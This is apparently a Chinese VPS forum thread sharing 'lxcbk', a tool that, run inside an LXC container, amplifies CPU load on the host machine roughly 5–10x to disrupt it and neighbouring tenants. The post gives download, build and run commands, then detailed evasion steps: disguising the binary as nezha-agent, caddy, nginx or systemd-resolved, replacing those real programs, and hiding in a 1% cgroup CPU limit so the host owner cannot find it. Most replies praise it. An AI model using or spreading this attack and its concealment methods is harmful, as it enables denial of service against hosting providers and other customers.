嘟嘟社区

LXC小鸡通杀炸母鸡脚本,实测真的有用


本帖最后由 LinusTorvalds 于 2024-9-10 00:34 编辑

源码仓库:https://github.com/oplxc/lxcbenchmark

下载:

  1. wget https://github.com/oplxc/lxcbenchmark/archive/refs/heads/main.zip

复制代码

解压:

  1. unzip main.zip
  2. mv lxcbenchmark-main/* .
  3. make
  4. chmod +x lxcbk

复制代码

实测线程调整为2有较高放大比例,不建议调整的过大。

  1. export thd=2

复制代码

直接运行

  1. ./lxcbk

复制代码

在自己pve机器下开出来的lxc测试,放大比例(lxcfs(占用):lxcbk(目标程序占用))确实将近5-10倍。

在lxc超售太猛的机器上更加有效,放大比例更加很大。都能看到邻居探针更猛烈的掉线和仰卧起坐。

lxcbk(炸鸡程序)实测可以改名。不要用默认的lxcbk名称,改为nezha-agent或者caddy之类的。然后lxcbk替换掉默认的/opt/nezha/agent/nezha-agent。并且也可使用 /opt/nezha/agent/nezha-agent -s xxxxx.com:443 -p xxxxxxx伪装启动。这样老板在母鸡上ps很难揪出你的程序。

不过为了防止更能被揪出来。建议不要只依赖启动一个程序,启动多个程序,同时每个程序只占用1%的cpu,这样老板就更难揪出来了。

实测使用lxcbk替换以下程序,/usr/local/bin/caddy,/usr/local/bin/xray,/lib/systemd/systemd-resolved,/sbin/nginx。
然后再使用cpu限制模式启动,鸡主很难发现。

可以用1%占用启动多个程序,这样就不容易被发现。

建议方法cgroup2限制,不容易发现:

  1. mkdir /sys/fs/cgroup/cgroupbk
  2. echo "1000 100000" | sudo tee /sys/fs/cgroup/cgroupbk/cpu.max
  3. setsid /usr/local/bin/caddy run &
  4. new_pid=$!
  5. echo $((new_pid + 1)) > /sys/fs/cgroup/cgroupbk/cgroup.procs

复制代码

备用方法cpulimit,有发现风险:

  1. cpulimit –limit 1 — /usr/local/bin/caddy run

复制代码

/usr/local/bin/caddy是伪装的程序,实测lxcbk可以伪装为任何程序。然后启动多个不同名称的伪装程序实行炸鸡。

lxcbk对母鸡的放大比例能达到10倍,炸鸡程序占用1%,母鸡会占用10%左右。真的有效

用户名真难起 发表于 2024-9-10 00:35
只能说……牛……CCS和CC会颤抖么

之前看到这个程序的时候测试过了的,只对lxc架构有效。kvm架构完全没用

损人不利己
人才啊,大佬威武
大佬
只能说……牛……CCS和CC会颤抖么

LinusTorvalds 发表于 2024-9-10 00:36
之前看到这个程序的时候测试过了的,只对lxc架构有效。kvm架构完全没用

原来大佬已经测过了,严谨

可以的,很6,还好我没lxc的机器
本来看机器还有80G内存空闲,想开点LXC给MJJ玩的,还是算了。